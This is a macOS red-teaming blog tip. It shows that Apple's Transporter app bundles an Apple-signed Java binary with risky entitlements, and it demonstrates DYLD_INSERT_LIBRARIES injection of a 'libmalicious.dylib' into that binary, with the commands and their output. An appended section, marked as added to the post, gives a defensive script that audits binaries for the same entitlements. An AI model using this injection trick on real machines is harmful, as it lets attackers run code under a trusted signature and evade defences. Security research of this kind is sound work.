macOS Red Teaming Tricks series

The idea of the #macOSRedTeamingTricks series is to share simple, ready-to-use tricks that may help you during macOS red teaming engagements.

The trick

There are many code execution and persistence methods on macOS, including ones that deliver your own interpreter or runtime, such as Java. Recently, I found out that Apple’s Transporter app contains a working Java environment. So if you need a Java binary signed directly with the Apple Dev-ID certificate, go and grab it!

Why might it be useful?

Signature

% codesign -d -vv /Applications/Transporter.app/Contents/itms/java/bin/java
Executable=/Applications/Transporter.app/Contents/itms/java/bin/java
Identifier=net.java.openjdk.cmd
Format=Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=768 flags=0x10000(runtime) hashes=13+7 location=embedded
Signature size=4698
Authority=Apple Mac OS Application Signing
Authority=Apple Worldwide Developer Relations Certification Authority
Authority=Apple Root CA
Info.plist entries=4
TeamIdentifier=K36BKF7T3D
Runtime Version=11.0.0
Sealed Resources=none
Internal requirements count=1 size=220

Entitlements

% codesign -d --entitlements - /Applications/Transporter.app/Contents/itms/java/bin/java
Executable=/Applications/Transporter.app/Contents/itms/java/bin/java
[Dict]
	[Key] com.apple.security.cs.debugger
	[Value]
		[Bool] true
	[Key] com.apple.security.cs.allow-jit
	[Value]
		[Bool] true
	[Key] com.apple.security.device.audio-input
	[Value]
		[Bool] true
	[Key] com.apple.security.cs.disable-library-validation
	[Value]
		[Bool] true
	[Key] com.apple.security.cs.allow-dyld-environment-variables
	[Value]
		[Bool] true
	[Key] com.apple.security.cs.allow-unsigned-executable-memory
	[Value]
		[Bool] true

Architectures

It works on both x86_64 and arm64.

% lipo -archs /Applications/Transporter.app/Contents/itms/java/bin/java
x86_64 arm64

Code injection on M1 :-)

% DYLD_INSERT_LIBRARIES=./libmalicious.dylib /Applications/Transporter.app/Contents/itms/java/bin/java --version
2022-07-11 13:37:00.000 java[9121:59191] [+] Dylib injected
openjdk 14.0.2 2020-07-14
OpenJDK Runtime Environment 14.0.2-5906ce1373 (fastdebug build 14.0.2+12-iTunesOpenJDK-8)
OpenJDK 64-Bit Zero VM 14.0.2-5906ce1373 (fastdebug build 14.0.2+12-iTunesOpenJDK-8, interpreted mode)
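As an added example that is not part of the original post: a small audit script for the defender side, which finds other bundled binaries carrying the same entitlement pair (disable-library-validation plus allow-dyld-environment-variables) that makes the DYLD_INSERT_LIBRARIES trick above work. It assumes the [Dict]/[Key]/[Value] text form of `codesign -d --entitlements -` shown earlier and that codesign(1) is available; the tree walk is skipped where it is not.

```shell
#!/bin/bash
# Added example (not from the original post): audit Mach-O binaries for the
# entitlement pair that makes the Transporter Java binary injectable.
# Parses the "[Dict]/[Key]/[Value]" text form of `codesign -d --entitlements -`.

# Print, one per line, every entitlement key whose value is "[Bool] true".
# Input: a codesign entitlement dump on stdin.
true_entitlements() {
  awk '
    /\[Key\]/       { key = $2 }
    /\[Bool\] true/ { if (key != "") { print key; key = "" } }
  '
}

# Return 0 when the dump on stdin grants BOTH disable-library-validation and
# allow-dyld-environment-variables: together they let DYLD_INSERT_LIBRARIES load
# an unsigned dylib into a hardened-runtime process. Return 1 otherwise.
is_injectable() {
  local keys
  keys=$(true_entitlements)
  if printf '%s\n' "$keys" | grep -qx 'com.apple.security.cs.disable-library-validation' &&
     printf '%s\n' "$keys" | grep -qx 'com.apple.security.cs.allow-dyld-environment-variables'; then
    return 0
  fi
  return 1
}

# Walk a directory tree and report executables carrying the risky pair (macOS only).
# Assumes codesign(1) is present; on other systems the walk is skipped.
audit_tree() {
  local root="$1" f
  command -v codesign >/dev/null 2>&1 || { echo "codesign not found; skipping $root" >&2; return 0; }
  find "$root" -type f -perm -100 2>/dev/null | while read -r f; do
    if codesign -d --entitlements - "$f" 2>/dev/null | is_injectable; then
      echo "INJECTABLE: $f"
    fi
  done
}

# Constructed sample mirroring the Transporter dump above, for an offline check.
SAMPLE='[Dict]
    [Key] com.apple.security.cs.disable-library-validation
    [Value]
        [Bool] true
    [Key] com.apple.security.cs.allow-dyld-environment-variables
    [Value]
        [Bool] true'

if printf '%s\n' "$SAMPLE" | is_injectable; then
  echo "sample: injectable (expected)"
fi
audit_tree /Applications
```

Run it as a normal user; it only reads signatures and prints the paths whose entitlements match.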